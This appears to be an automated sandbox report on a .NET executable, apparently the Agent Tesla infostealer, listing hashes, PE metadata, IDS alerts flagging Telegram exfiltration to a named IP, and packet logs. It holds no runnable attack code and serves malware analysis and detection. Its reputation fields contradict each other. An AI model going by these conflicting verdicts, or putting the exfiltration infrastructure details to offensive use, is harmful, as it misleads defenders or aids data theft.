SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.906401671315325
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	LisectAVT_2403002A_127.exe
File size:	697'350 bytes
MD5:	67cf14e98914a0ae61cda009d3ed1df7
SHA1:	4bf4a1f9365eb649a2fdf1a30b2e4c149fad03dc
SHA256:	79d0926744b84fc30f2a528b4aa64b2aa015001616f7062f15695fa00de45081
SHA512:	b1edfdb6f9b03c2a9f1a0498bf28b40c1d3a2e4de80c7a8ff29397a9eaa1f787ccc2dbf2f9a69da1c601c963589187f43c2820b683435b8cfcbcfc703046360d
SSDEEP:	12288:BJggC74CMw3iOdiDSZnRtnt9iXSSfI5qIFngvpZsG9WxzQaU3y:BJgFoOdjtnOSKPhh6GEQn3
TLSH:	AEE4125BBB944377D25603F195AB198573BE602A3231C2581D9090EE1BB3F148A3AFE7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;...............0.................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4ab782
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC63BD28A [Thu May 23 03:54:50 2075 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor al, 35h
xor eax, 43465138h
push eax
xor eax, 38453452h
xor dl, byte ptr [ecx+eax*2+5Ah]
push esi
dec eax
dec eax
inc ebx
inc esp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xab72d	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x630	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xae000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa9b88	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa97a0	0xa9800	8193fd6706e74e29a5e3aae149a0d41a	False	0.9189553950036873	data	7.915103665911927	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xac000	0x630	0x800	6595a3cb851e08b0dfc25234ff242d30	False	0.3388671875	data	3.4917892739525604	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xae000	0xc	0x200	f85008b1c8606e59e24b00d7ccff7558	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xac090	0x3a0	data			0.41810344827586204
RT_MANIFEST	0xac440	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T00:02:16.228907+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49745	443	192.168.2.6	149.154.167.220
2024-07-26T00:01:20.476194+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49734	443	192.168.2.6	149.154.167.220
2024-07-26T00:03:12.778554+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49755	443	192.168.2.6	149.154.167.220
2024-07-26T00:03:04.473362+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49752	443	192.168.2.6	149.154.167.220
2024-07-26T00:01:18.963992+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49733	443	192.168.2.6	149.154.167.220
2024-07-26T00:02:49.873314+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49750	443	192.168.2.6	149.154.167.220
2024-07-26T00:03:17.387586+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49757	443	192.168.2.6	149.154.167.220
2024-07-26T00:02:30.614435+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49747	443	192.168.2.6	149.154.167.220
2024-07-26T00:00:57.740029+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49730	443	192.168.2.6	149.154.167.220
2024-07-26T00:00:52.810767+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49728	443	192.168.2.6	149.154.167.220
2024-07-26T00:02:08.271354+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49742	443	192.168.2.6	149.154.167.220
2024-07-26T00:01:35.574667+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49736	443	192.168.2.6	149.154.167.220
2024-07-26T00:01:42.459543+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49738	443	192.168.2.6	149.154.167.220
2024-07-25T23:59:27.125307+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49719	20.12.23.50	192.168.2.6
2024-07-26T00:02:21.632702+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49746	443	192.168.2.6	149.154.167.220
2024-07-26T00:02:59.571959+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49751	443	192.168.2.6	149.154.167.220
2024-07-26T00:02:09.266140+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49743	443	192.168.2.6	149.154.167.220
2024-07-26T00:00:59.090939+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49731	443	192.168.2.6	149.154.167.220
2024-07-26T00:01:40.324857+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49737	443	192.168.2.6	149.154.167.220
2024-07-26T00:02:00.361986+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49741	443	192.168.2.6	149.154.167.220
2024-07-26T00:01:22.620409+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49735	443	192.168.2.6	149.154.167.220
2024-07-26T00:03:05.972685+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49753	443	192.168.2.6	149.154.167.220
2024-07-25T23:59:19.197358+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49717	443	192.168.2.6	149.154.167.220
2024-07-26T00:00:04.546790+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49725	20.12.23.50	192.168.2.6
2024-07-26T00:01:48.498588+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49740	443	192.168.2.6	149.154.167.220
2024-07-26T00:01:11.484324+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49732	443	192.168.2.6	149.154.167.220
2024-07-26T00:02:41.578349+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49748	443	192.168.2.6	149.154.167.220
2024-07-26T00:03:08.262544+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49754	443	192.168.2.6	149.154.167.220
2024-07-26T00:02:12.072219+0200	TCP	2852815	ETPRO MALWARE Agent Tesla Telegram Exfil M2	49744	443	192.168.2.6	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 23:59:15.004329920 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:15.004374981 CEST	443	49716	104.26.13.205	192.168.2.6
Jul 25, 2024 23:59:15.004498959 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:15.011059046 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:15.011077881 CEST	443	49716	104.26.13.205	192.168.2.6
Jul 25, 2024 23:59:15.499675035 CEST	443	49716	104.26.13.205	192.168.2.6
Jul 25, 2024 23:59:15.499753952 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:15.501621962 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:15.501627922 CEST	443	49716	104.26.13.205	192.168.2.6
Jul 25, 2024 23:59:15.501876116 CEST	443	49716	104.26.13.205	192.168.2.6
Jul 25, 2024 23:59:15.542680979 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:15.556162119 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:15.600523949 CEST	443	49716	104.26.13.205	192.168.2.6
Jul 25, 2024 23:59:15.669361115 CEST	443	49716	104.26.13.205	192.168.2.6
Jul 25, 2024 23:59:15.669469118 CEST	443	49716	104.26.13.205	192.168.2.6
Jul 25, 2024 23:59:15.669527054 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:15.675133944 CEST	49716	443	192.168.2.6	104.26.13.205
Jul 25, 2024 23:59:16.303420067 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 25, 2024 23:59:16.303514004 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:16.303597927 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 25, 2024 23:59:16.304650068 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 25, 2024 23:59:16.304682970 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:16.935292006 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:16.935359001 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 25, 2024 23:59:16.937222958 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 25, 2024 23:59:16.937232971 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:16.937473059 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:16.938875914 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 25, 2024 23:59:16.984503031 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:17.232371092 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:17.232626915 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 25, 2024 23:59:17.232650042 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:19.197386980 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:19.197525978 CEST	443	49717	149.154.167.220	192.168.2.6
Jul 25, 2024 23:59:19.197617054 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 25, 2024 23:59:19.202209949 CEST	49717	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:51.852454901 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:51.852505922 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:51.852580070 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:51.853101015 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:51.853111029 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:52.497275114 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:52.510075092 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:52.510094881 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:52.809459925 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:52.810113907 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:52.810136080 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:52.810395002 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:52.810405970 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:52.810713053 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:52.810720921 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:53.157732010 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:53.158307076 CEST	443	49728	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:53.158354998 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:53.158431053 CEST	49728	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:56.496120930 CEST	49730	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:56.496181011 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:56.500509977 CEST	49730	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:56.500509977 CEST	49730	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:56.500559092 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:57.421861887 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:57.423902988 CEST	49730	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:57.423923016 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:57.739348888 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:57.739694118 CEST	49730	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:57.739720106 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:57.739830971 CEST	49730	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:57.739847898 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:57.739914894 CEST	49730	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:57.739929914 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:58.075686932 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:58.075733900 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:58.076143980 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:58.076488972 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:58.076498985 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:58.094763041 CEST	443	49730	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:58.095654964 CEST	49730	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:58.765328884 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:58.767230988 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:58.767260075 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.089742899 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.090604067 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:59.090625048 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.090647936 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:59.090662956 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.090681076 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:59.090687037 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.090742111 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:59.090759993 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.090810061 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:59.090817928 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.449945927 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.450288057 CEST	443	49731	149.154.167.220	192.168.2.6
Jul 26, 2024 00:00:59.450429916 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:00:59.450613976 CEST	49731	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:10.496318102 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:10.496375084 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:10.497860909 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:10.498084068 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:10.498092890 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.150144100 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.152102947 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:11.152116060 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.483280897 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.483995914 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:11.484018087 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.484029055 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:11.484034061 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.484106064 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:11.484117031 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.484287977 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:11.484296083 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.832446098 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.832613945 CEST	443	49732	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:11.832660913 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:11.833260059 CEST	49732	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:18.026664019 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:18.026700974 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:18.026993990 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:18.030108929 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:18.030123949 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:18.657047987 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:18.659035921 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:18.659050941 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:18.958671093 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:18.960464001 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:18.960499048 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:18.962866068 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:18.962897062 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:18.963913918 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:18.963931084 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:19.317627907 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:19.317730904 CEST	443	49733	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:19.317996979 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:19.318217993 CEST	49733	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:19.452750921 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:19.452796936 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:19.452864885 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:19.453243017 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:19.453254938 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.133105993 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.134874105 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:20.134902954 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.475481987 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.475881100 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:20.475917101 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.475996017 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:20.476010084 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.476078033 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:20.476087093 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.832113981 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.832657099 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:20.832679033 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.832777977 CEST	443	49734	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:20.832851887 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:20.832876921 CEST	49734	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:21.656552076 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:21.656605005 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:21.656732082 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:21.657088041 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:21.657098055 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.300020933 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.302187920 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:22.302212000 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.619575024 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.619951963 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:22.619976997 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.620126963 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:22.620137930 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.620208025 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:22.620218039 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.989844084 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.989943027 CEST	443	49735	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:22.990108013 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:22.990535021 CEST	49735	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:34.610832930 CEST	49736	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:34.610872030 CEST	443	49736	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:34.610935926 CEST	49736	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:34.611342907 CEST	49736	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:34.611350060 CEST	443	49736	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:35.238863945 CEST	443	49736	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:35.242201090 CEST	49736	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:35.242213964 CEST	443	49736	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:35.571036100 CEST	443	49736	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:35.572177887 CEST	49736	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:35.572200060 CEST	443	49736	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:35.572357893 CEST	49736	443	192.168.2.6	149.154.167.220
Jul 26, 2024 00:01:35.572386980 CEST	443	49736	149.154.167.220	192.168.2.6
Jul 26, 2024 00:01:35.574568987 CEST	49736	443	192.168.2.6	149.154.167.220
